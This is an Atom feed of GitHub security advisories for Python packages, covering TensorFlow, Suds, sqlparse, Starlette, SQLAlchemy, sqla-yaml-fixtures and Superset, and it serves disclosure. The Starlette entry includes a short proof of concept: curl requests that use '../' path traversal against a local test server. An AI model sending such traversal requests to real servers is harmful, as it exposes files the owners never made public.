<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
    <id>https://azu.github.io/github-advisory-database-rss/pip.rss</id>
    <title>Security Advisory for Python packages hosted at PyPI.org</title>
    <updated>2024-10-28T15:01:30.247Z</updated>
    <generator>github-advisory-database-rss</generator>
    <link rel="alternate" href="https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"/>
    <subtitle>Security Advisory for Python packages hosted at PyPI.org on GitHub</subtitle>
    <rights>github-advisory-database-rss</rights>
    <category term="CRITICAL"/>
    <category term="HIGH"/>
    <category term="MODERATE"/>
    <category term="LOW"/>
    <entry>
        <title type="html"><![CDATA[[tensorflow-gpu] Heap buffer overflow in `UnsortedSegmentSum` in TensorFlow]]></title>
        <id>https://github.com/advisories/GHSA-844w-j86r-4x2j</id>
        <link href="https://github.com/advisories/GHSA-844w-j86r-4x2j"/>
        <updated>2024-10-28T14:44:39.000Z</updated>
        <content type="html"><![CDATA[<h3 id="impact">Impact</h3>
<p>A heap buffer overflow in <code>UnsortedSegmentSum</code> can be produced when the <code>Index</code> template argument is <code>int32</code>. In this case <code>data_size</code> and <code>num_segments</code> fields are truncated from <code>int64</code> to <code>int32</code> and can produce negative numbers, resulting in accessing out of bounds heap memory.</p>
<p>This is unlikely to be exploitable and was detected and fixed internally. We are making the security advisory only to notify users that it is better to update to TensorFlow 1.15 or 2.0 or later as these versions already have this fixed.</p>
<h3 id="patches">Patches</h3>
<p>Patched by db4f9717c41bccc3ce10099ab61996b246099892 and released in all official releases after 1.15 and 2.0.</p>
<h3 id="for-more-information">For more information</h3>
<p>Please consult <a href="https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md"><code>SECURITY.md</code></a> for more information regarding the security model and how to contact us with issues and questions.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/tensorflow/tensorflow/security/advisories/GHSA-844w-j86r-4x2j">https://github.com/tensorflow/tensorflow/security/advisories/GHSA-844w-j86r-4x2j</a></li>
<li><a href="https://github.com/tensorflow/tensorflow/commit/db4f9717c41bccc3ce10099ab61996b246099892">https://github.com/tensorflow/tensorflow/commit/db4f9717c41bccc3ce10099ab61996b246099892</a></li>
<li><a href="https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2019-002.md">https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2019-002.md</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16778">https://nvd.nist.gov/vuln/detail/CVE-2019-16778</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2019-227.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2019-227.yaml</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2019-234.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2019-234.yaml</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2019-209.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2019-209.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-844w-j86r-4x2j">https://github.com/advisories/GHSA-844w-j86r-4x2j</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-844w-j86r-4x2j</uri>
        </author>
        <category label="severity" term="LOW"/>
        <published>2019-12-16T20:17:10.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[tensorflow-cpu] Heap buffer overflow in `UnsortedSegmentSum` in TensorFlow]]></title>
        <id>https://github.com/advisories/GHSA-844w-j86r-4x2j</id>
        <link href="https://github.com/advisories/GHSA-844w-j86r-4x2j"/>
        <updated>2024-10-28T14:44:39.000Z</updated>
        <content type="html"><![CDATA[<h3 id="impact">Impact</h3>
<p>A heap buffer overflow in <code>UnsortedSegmentSum</code> can be produced when the <code>Index</code> template argument is <code>int32</code>. In this case <code>data_size</code> and <code>num_segments</code> fields are truncated from <code>int64</code> to <code>int32</code> and can produce negative numbers, resulting in accessing out of bounds heap memory.</p>
<p>This is unlikely to be exploitable and was detected and fixed internally. We are making the security advisory only to notify users that it is better to update to TensorFlow 1.15 or 2.0 or later as these versions already have this fixed.</p>
<h3 id="patches">Patches</h3>
<p>Patched by db4f9717c41bccc3ce10099ab61996b246099892 and released in all official releases after 1.15 and 2.0.</p>
<h3 id="for-more-information">For more information</h3>
<p>Please consult <a href="https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md"><code>SECURITY.md</code></a> for more information regarding the security model and how to contact us with issues and questions.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/tensorflow/tensorflow/security/advisories/GHSA-844w-j86r-4x2j">https://github.com/tensorflow/tensorflow/security/advisories/GHSA-844w-j86r-4x2j</a></li>
<li><a href="https://github.com/tensorflow/tensorflow/commit/db4f9717c41bccc3ce10099ab61996b246099892">https://github.com/tensorflow/tensorflow/commit/db4f9717c41bccc3ce10099ab61996b246099892</a></li>
<li><a href="https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2019-002.md">https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2019-002.md</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16778">https://nvd.nist.gov/vuln/detail/CVE-2019-16778</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2019-227.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2019-227.yaml</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2019-234.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2019-234.yaml</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2019-209.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2019-209.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-844w-j86r-4x2j">https://github.com/advisories/GHSA-844w-j86r-4x2j</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-844w-j86r-4x2j</uri>
        </author>
        <category label="severity" term="LOW"/>
        <published>2019-12-16T20:17:10.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[tensorflow] Heap buffer overflow in `UnsortedSegmentSum` in TensorFlow]]></title>
        <id>https://github.com/advisories/GHSA-844w-j86r-4x2j</id>
        <link href="https://github.com/advisories/GHSA-844w-j86r-4x2j"/>
        <updated>2024-10-28T14:44:39.000Z</updated>
        <content type="html"><![CDATA[<h3 id="impact">Impact</h3>
<p>A heap buffer overflow in <code>UnsortedSegmentSum</code> can be produced when the <code>Index</code> template argument is <code>int32</code>. In this case <code>data_size</code> and <code>num_segments</code> fields are truncated from <code>int64</code> to <code>int32</code> and can produce negative numbers, resulting in accessing out of bounds heap memory.</p>
<p>This is unlikely to be exploitable and was detected and fixed internally. We are making the security advisory only to notify users that it is better to update to TensorFlow 1.15 or 2.0 or later as these versions already have this fixed.</p>
<h3 id="patches">Patches</h3>
<p>Patched by db4f9717c41bccc3ce10099ab61996b246099892 and released in all official releases after 1.15 and 2.0.</p>
<h3 id="for-more-information">For more information</h3>
<p>Please consult <a href="https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md"><code>SECURITY.md</code></a> for more information regarding the security model and how to contact us with issues and questions.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/tensorflow/tensorflow/security/advisories/GHSA-844w-j86r-4x2j">https://github.com/tensorflow/tensorflow/security/advisories/GHSA-844w-j86r-4x2j</a></li>
<li><a href="https://github.com/tensorflow/tensorflow/commit/db4f9717c41bccc3ce10099ab61996b246099892">https://github.com/tensorflow/tensorflow/commit/db4f9717c41bccc3ce10099ab61996b246099892</a></li>
<li><a href="https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2019-002.md">https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2019-002.md</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16778">https://nvd.nist.gov/vuln/detail/CVE-2019-16778</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2019-227.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2019-227.yaml</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2019-234.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2019-234.yaml</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2019-209.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2019-209.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-844w-j86r-4x2j">https://github.com/advisories/GHSA-844w-j86r-4x2j</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-844w-j86r-4x2j</uri>
        </author>
        <category label="severity" term="LOW"/>
        <published>2019-12-16T20:17:10.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[suds-py3] Improper Link Resolution Before File Access in Suds]]></title>
        <id>https://github.com/advisories/GHSA-vpqp-hx68-p2wx</id>
        <link href="https://github.com/advisories/GHSA-vpqp-hx68-p2wx"/>
        <updated>2024-10-28T14:37:29.000Z</updated>
        <content type="html"><![CDATA[<p>cache.py in Suds 0.4, when tempdir is set to None, allows local users to redirect SOAP queries and possibly have other unspecified impact via a symlink attack on a cache file with a predictable name in /tmp/suds/.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2013-2217">https://nvd.nist.gov/vuln/detail/CVE-2013-2217</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=978696">https://bugzilla.redhat.com/show_bug.cgi?id=978696</a></li>
<li><a href="http://lists.opensuse.org/opensuse-updates/2013-07/msg00062.html">http://lists.opensuse.org/opensuse-updates/2013-07/msg00062.html</a></li>
<li><a href="http://www.openwall.com/lists/oss-security/2013/06/27/8">http://www.openwall.com/lists/oss-security/2013/06/27/8</a></li>
<li><a href="http://www.ubuntu.com/usn/USN-2008-1">http://www.ubuntu.com/usn/USN-2008-1</a></li>
<li><a href="https://github.com/advisories/GHSA-vpqp-hx68-p2wx">https://github.com/advisories/GHSA-vpqp-hx68-p2wx</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/suds/PYSEC-2013-32.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/suds/PYSEC-2013-32.yaml</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/suds-py3/PYSEC-2013-33.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/suds-py3/PYSEC-2013-33.yaml</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-vpqp-hx68-p2wx</uri>
        </author>
        <category label="severity" term="MODERATE"/>
        <published>2022-05-14T01:08:23.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[sqlparse] sqlparse contains a regular expression that is vulnerable to Regular Expression Denial of Service]]></title>
        <id>https://github.com/advisories/GHSA-rrm6-wvj7-cwh2</id>
        <link href="https://github.com/advisories/GHSA-rrm6-wvj7-cwh2"/>
        <updated>2024-10-28T14:30:18.000Z</updated>
        <content type="html"><![CDATA[<h3 id="impact">Impact</h3>
<p>The SQL parser contains a regular expression that is vulnerable to <a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">ReDoS</a> (Regular Expression Denial of Service). The vulnerability may lead to Denial of Service (DoS).</p>
<h3 id="patches">Patches</h3>
<p>This issues has been fixed in sqlparse 0.4.4.</p>
<h3 id="workarounds">Workarounds</h3>
<p>None. </p>
<h3 id="references">References</h3>
<p>This issue was discovered and reported by GHSL team member <a href="https://github.com/erik-krogh">@erik-krogh (Erik Krogh Kristensen)</a>.</p>
<ul>
<li>Commit that introduced the vulnerability: e75e35869473832a1eb67772b1adfee2db11b85a</li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-rrm6-wvj7-cwh2">https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-rrm6-wvj7-cwh2</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-30608">https://nvd.nist.gov/vuln/detail/CVE-2023-30608</a></li>
<li><a href="https://github.com/andialbrecht/sqlparse/commit/c457abd5f097dd13fb21543381e7cfafe7d31cfb">https://github.com/andialbrecht/sqlparse/commit/c457abd5f097dd13fb21543381e7cfafe7d31cfb</a></li>
<li><a href="https://github.com/andialbrecht/sqlparse/commit/e75e35869473832a1eb67772b1adfee2db11b85a">https://github.com/andialbrecht/sqlparse/commit/e75e35869473832a1eb67772b1adfee2db11b85a</a></li>
<li><a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS</a></li>
<li><a href="https://lists.debian.org/debian-lts-announce/2023/05/msg00017.html">https://lists.debian.org/debian-lts-announce/2023/05/msg00017.html</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/sqlparse/PYSEC-2023-87.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/sqlparse/PYSEC-2023-87.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-rrm6-wvj7-cwh2">https://github.com/advisories/GHSA-rrm6-wvj7-cwh2</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-rrm6-wvj7-cwh2</uri>
        </author>
        <category label="severity" term="MODERATE"/>
        <published>2023-04-21T20:24:21.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[starlette] Starlette has Path Traversal vulnerability in StaticFiles]]></title>
        <id>https://github.com/advisories/GHSA-v5gw-mw7f-84px</id>
        <link href="https://github.com/advisories/GHSA-v5gw-mw7f-84px"/>
        <updated>2024-10-28T14:29:32.000Z</updated>
        <content type="html"><![CDATA[<h3 id="summary">Summary</h3>
<p>When using <code>StaticFiles</code>, if there's a file or directory that starts with the same name as the <code>StaticFiles</code> directory, that file or directory is also exposed via <code>StaticFiles</code> which is a path traversal vulnerability.</p>
<h3 id="details">Details</h3>
<p>The root cause of this issue is the usage of <code>os.path.commonprefix()</code>:
<a href="https://github.com/encode/starlette/blob/4bab981d9e870f6cee1bd4cd59b87ddaf355b2dc/starlette/staticfiles.py#L172-L174">https://github.com/encode/starlette/blob/4bab981d9e870f6cee1bd4cd59b87ddaf355b2dc/starlette/staticfiles.py#L172-L174</a></p>
<p>As stated in the Python documentation (<a href="https://docs.python.org/3/library/os.path.html#os.path.commonprefix">https://docs.python.org/3/library/os.path.html#os.path.commonprefix</a>) this function returns the longest prefix common to paths.</p>
<p>When passing a path like <code>/static/../static1.txt</code>, <code>os.path.commonprefix([full_path, directory])</code> returns <code>./static</code> which is the common part of <code>./static1.txt</code> and <code>./static</code>, It refers to <code>/static/../static1.txt</code> because it is considered in the staticfiles directory. As a result, it becomes possible to view files that should not be open to the public.</p>
<p>The solution is to use <code>os.path.commonpath</code> as the Python documentation explains that <code>os.path.commonprefix</code> works a character at a time, it does not treat the arguments as paths.</p>
<h3 id="poc">PoC</h3>
<p>In order to reproduce the issue, you need to create the following structure:</p>
<pre><code>├── static
│   ├── index.html
├── static_disallow
│   ├── index.html
└── static1.txt
</code></pre>
<p>And run the <code>Starlette</code> app with:</p>
<pre><code class="language-py">import uvicorn
from starlette.applications import Starlette
from starlette.routing import Mount
from starlette.staticfiles import StaticFiles


routes = [
    Mount("/static", app=StaticFiles(directory="static", html=True), name="static"),
]

app = Starlette(routes=routes)


if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=8000)
</code></pre>
<p>And running the commands:</p>
<pre><code class="language-shell">curl --path-as-is 'localhost:8000/static/../static_disallow/'
curl --path-as-is 'localhost:8000/static/../static1.txt'
</code></pre>
<p>The <code>static1.txt</code> and the directory <code>static_disallow</code> are exposed.</p>
<h3 id="impact">Impact</h3>
<p>Confidentiality is breached: An attacker may obtain files that should not be open to the public.</p>
<h3 id="credits">Credits</h3>
<p>Security researcher <strong>Masashi Yamane of LAC Co., Ltd</strong> reported this vulnerability to <strong>JPCERT/CC Vulnerability Coordination Group</strong> and they contacted us to coordinate a patch for the security issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/encode/starlette/security/advisories/GHSA-v5gw-mw7f-84px">https://github.com/encode/starlette/security/advisories/GHSA-v5gw-mw7f-84px</a></li>
<li><a href="https://github.com/encode/starlette/commit/1797de464124b090f10cf570441e8292936d63e3">https://github.com/encode/starlette/commit/1797de464124b090f10cf570441e8292936d63e3</a></li>
<li><a href="https://github.com/encode/starlette/blob/4bab981d9e870f6cee1bd4cd59b87ddaf355b2dc/starlette/staticfiles.py#L172-L174">https://github.com/encode/starlette/blob/4bab981d9e870f6cee1bd4cd59b87ddaf355b2dc/starlette/staticfiles.py#L172-L174</a></li>
<li><a href="https://github.com/encode/starlette/releases/tag/0.27.0">https://github.com/encode/starlette/releases/tag/0.27.0</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-29159">https://nvd.nist.gov/vuln/detail/CVE-2023-29159</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/starlette/PYSEC-2023-83.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/starlette/PYSEC-2023-83.yaml</a></li>
<li><a href="https://jvn.jp/en/jp/JVN95981715">https://jvn.jp/en/jp/JVN95981715</a></li>
<li><a href="https://github.com/advisories/GHSA-v5gw-mw7f-84px">https://github.com/advisories/GHSA-v5gw-mw7f-84px</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-v5gw-mw7f-84px</uri>
        </author>
        <category label="severity" term="MODERATE"/>
        <published>2023-05-17T03:49:14.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[sqla-yaml-fixtures] sqla-yaml-fixtures is vulnerable to Code Injection]]></title>
        <id>https://github.com/advisories/GHSA-2x54-j4m3-r6wx</id>
        <link href="https://github.com/advisories/GHSA-2x54-j4m3-r6wx"/>
        <updated>2024-10-28T14:23:43.000Z</updated>
        <content type="html"><![CDATA[<p>Sqla_yaml_fixtures versions up to 0.9.1 allows local users to execute arbitrary python code via the fixture_text argument in <code>sqla_yaml_fixtures.load</code>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-3575">https://nvd.nist.gov/vuln/detail/CVE-2019-3575</a></li>
<li><a href="https://github.com/schettino72/sqla_yaml_fixtures/issues/20">https://github.com/schettino72/sqla_yaml_fixtures/issues/20</a></li>
<li><a href="https://github.com/advisories/GHSA-2x54-j4m3-r6wx">https://github.com/advisories/GHSA-2x54-j4m3-r6wx</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/sqla-yaml-fixtures/PYSEC-2019-122.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/sqla-yaml-fixtures/PYSEC-2019-122.yaml</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-2x54-j4m3-r6wx</uri>
        </author>
        <category label="severity" term="HIGH"/>
        <published>2019-01-04T17:44:48.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[SQLAlchemy] SQLAlchemy is vulnerable to SQL Injection via group_by parameter ]]></title>
        <id>https://github.com/advisories/GHSA-38fc-9xqv-7f7q</id>
        <link href="https://github.com/advisories/GHSA-38fc-9xqv-7f7q"/>
        <updated>2024-10-28T14:22:50.000Z</updated>
        <content type="html"><![CDATA[<p>SQLAlchemy 1.2.17 has SQL Injection when the group_by parameter can be controlled.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-7548">https://nvd.nist.gov/vuln/detail/CVE-2019-7548</a></li>
<li><a href="https://github.com/sqlalchemy/sqlalchemy/issues/4481#issuecomment-461204518">https://github.com/sqlalchemy/sqlalchemy/issues/4481#issuecomment-461204518</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2019:0981">https://access.redhat.com/errata/RHSA-2019:0981</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2019:0984">https://access.redhat.com/errata/RHSA-2019:0984</a></li>
<li><a href="https://github.com/advisories/GHSA-38fc-9xqv-7f7q">https://github.com/advisories/GHSA-38fc-9xqv-7f7q</a></li>
<li><a href="https://github.com/no-security/sqlalchemy_test">https://github.com/no-security/sqlalchemy_test</a></li>
<li><a href="https://lists.debian.org/debian-lts-announce/2019/03/msg00020.html">https://lists.debian.org/debian-lts-announce/2019/03/msg00020.html</a></li>
<li><a href="https://www.oracle.com/security-alerts/cpujan2021.html">https://www.oracle.com/security-alerts/cpujan2021.html</a></li>
<li><a href="http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00087.html">http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00087.html</a></li>
<li><a href="http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00010.html">http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00010.html</a></li>
<li><a href="http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00016.html">http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00016.html</a></li>
<li><a href="https://lists.debian.org/debian-lts-announce/2021/11/msg00005.html">https://lists.debian.org/debian-lts-announce/2021/11/msg00005.html</a></li>
<li><a href="https://github.com/sqlalchemy/sqlalchemy/issues/4510">https://github.com/sqlalchemy/sqlalchemy/issues/4510</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/sqlalchemy/PYSEC-2019-124.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/sqlalchemy/PYSEC-2019-124.yaml</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-38fc-9xqv-7f7q</uri>
        </author>
        <category label="severity" term="CRITICAL"/>
        <published>2019-04-16T15:50:39.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[SQLAlchemy] SQLAlchemy vulnerable to SQL Injection via order_by parameter]]></title>
        <id>https://github.com/advisories/GHSA-887w-45rq-vxgf</id>
        <link href="https://github.com/advisories/GHSA-887w-45rq-vxgf"/>
        <updated>2024-10-28T14:20:16.000Z</updated>
        <content type="html"><![CDATA[<p>SQLAlchemy through 1.2.17 and 1.3.x through 1.3.0b2 allows SQL Injection via the order_by parameter.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-7164">https://nvd.nist.gov/vuln/detail/CVE-2019-7164</a></li>
<li><a href="https://github.com/sqlalchemy/sqlalchemy/issues/4481">https://github.com/sqlalchemy/sqlalchemy/issues/4481</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2019:0981">https://access.redhat.com/errata/RHSA-2019:0981</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2019:0984">https://access.redhat.com/errata/RHSA-2019:0984</a></li>
<li><a href="https://github.com/advisories/GHSA-887w-45rq-vxgf">https://github.com/advisories/GHSA-887w-45rq-vxgf</a></li>
<li><a href="https://lists.debian.org/debian-lts-announce/2019/03/msg00020.html">https://lists.debian.org/debian-lts-announce/2019/03/msg00020.html</a></li>
<li><a href="https://www.oracle.com/security-alerts/cpujan2021.html">https://www.oracle.com/security-alerts/cpujan2021.html</a></li>
<li><a href="http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00087.html">http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00087.html</a></li>
<li><a href="http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00010.html">http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00010.html</a></li>
<li><a href="http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00016.html">http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00016.html</a></li>
<li><a href="https://lists.debian.org/debian-lts-announce/2021/11/msg00005.html">https://lists.debian.org/debian-lts-announce/2021/11/msg00005.html</a></li>
<li><a href="https://github.com/sqlalchemy/sqlalchemy/commit/30307c4616ad67c01ddae2e1e8e34fabf6028414">https://github.com/sqlalchemy/sqlalchemy/commit/30307c4616ad67c01ddae2e1e8e34fabf6028414</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/sqlalchemy/PYSEC-2019-123.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/sqlalchemy/PYSEC-2019-123.yaml</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-887w-45rq-vxgf</uri>
        </author>
        <category label="severity" term="CRITICAL"/>
        <published>2019-04-16T15:50:41.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[SQLAlchemy] SQLAlchemy vulnerable to SQL Injection via order_by parameter]]></title>
        <id>https://github.com/advisories/GHSA-887w-45rq-vxgf</id>
        <link href="https://github.com/advisories/GHSA-887w-45rq-vxgf"/>
        <updated>2024-10-28T14:20:16.000Z</updated>
        <content type="html"><![CDATA[<p>SQLAlchemy through 1.2.17 and 1.3.x through 1.3.0b2 allows SQL Injection via the order_by parameter.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-7164">https://nvd.nist.gov/vuln/detail/CVE-2019-7164</a></li>
<li><a href="https://github.com/sqlalchemy/sqlalchemy/issues/4481">https://github.com/sqlalchemy/sqlalchemy/issues/4481</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2019:0981">https://access.redhat.com/errata/RHSA-2019:0981</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2019:0984">https://access.redhat.com/errata/RHSA-2019:0984</a></li>
<li><a href="https://github.com/advisories/GHSA-887w-45rq-vxgf">https://github.com/advisories/GHSA-887w-45rq-vxgf</a></li>
<li><a href="https://lists.debian.org/debian-lts-announce/2019/03/msg00020.html">https://lists.debian.org/debian-lts-announce/2019/03/msg00020.html</a></li>
<li><a href="https://www.oracle.com/security-alerts/cpujan2021.html">https://www.oracle.com/security-alerts/cpujan2021.html</a></li>
<li><a href="http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00087.html">http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00087.html</a></li>
<li><a href="http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00010.html">http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00010.html</a></li>
<li><a href="http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00016.html">http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00016.html</a></li>
<li><a href="https://lists.debian.org/debian-lts-announce/2021/11/msg00005.html">https://lists.debian.org/debian-lts-announce/2021/11/msg00005.html</a></li>
<li><a href="https://github.com/sqlalchemy/sqlalchemy/commit/30307c4616ad67c01ddae2e1e8e34fabf6028414">https://github.com/sqlalchemy/sqlalchemy/commit/30307c4616ad67c01ddae2e1e8e34fabf6028414</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/sqlalchemy/PYSEC-2019-123.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/sqlalchemy/PYSEC-2019-123.yaml</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-887w-45rq-vxgf</uri>
        </author>
        <category label="severity" term="CRITICAL"/>
        <published>2019-04-16T15:50:41.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[superset] Deserialization of Untrusted Data in superset]]></title>
        <id>https://github.com/advisories/GHSA-vxp9-wv2f-wqmw</id>
        <link href="https://github.com/advisories/GHSA-vxp9-wv2f-wqmw"/>
        <updated>2024-10-28T14:18:36.000Z</updated>
        <content type="html"><![CDATA[<p>Versions of Superset prior to 0.23 used an unsafe load method from the pickle library to deserialize data leading to possible remote code execution. Note Superset 0.23 was released prior to any Superset release under the Apache Software Foundation.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-8021">https://nvd.nist.gov/vuln/detail/CVE-2018-8021</a></li>
<li><a href="https://github.com/apache/superset/pull/4243">https://github.com/apache/superset/pull/4243</a></li>
<li><a href="https://github.com/apache/superset/commit/2c72a7ae4fc0a8bac1f037a79efa90e1c5549710">https://github.com/apache/superset/commit/2c72a7ae4fc0a8bac1f037a79efa90e1c5549710</a></li>
<li><a href="https://github.com/apache/incubator-superset/pull/4243">https://github.com/apache/incubator-superset/pull/4243</a></li>
<li><a href="https://github.com/advisories/GHSA-vxp9-wv2f-wqmw">https://github.com/advisories/GHSA-vxp9-wv2f-wqmw</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/superset/PYSEC-2018-74.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/superset/PYSEC-2018-74.yaml</a></li>
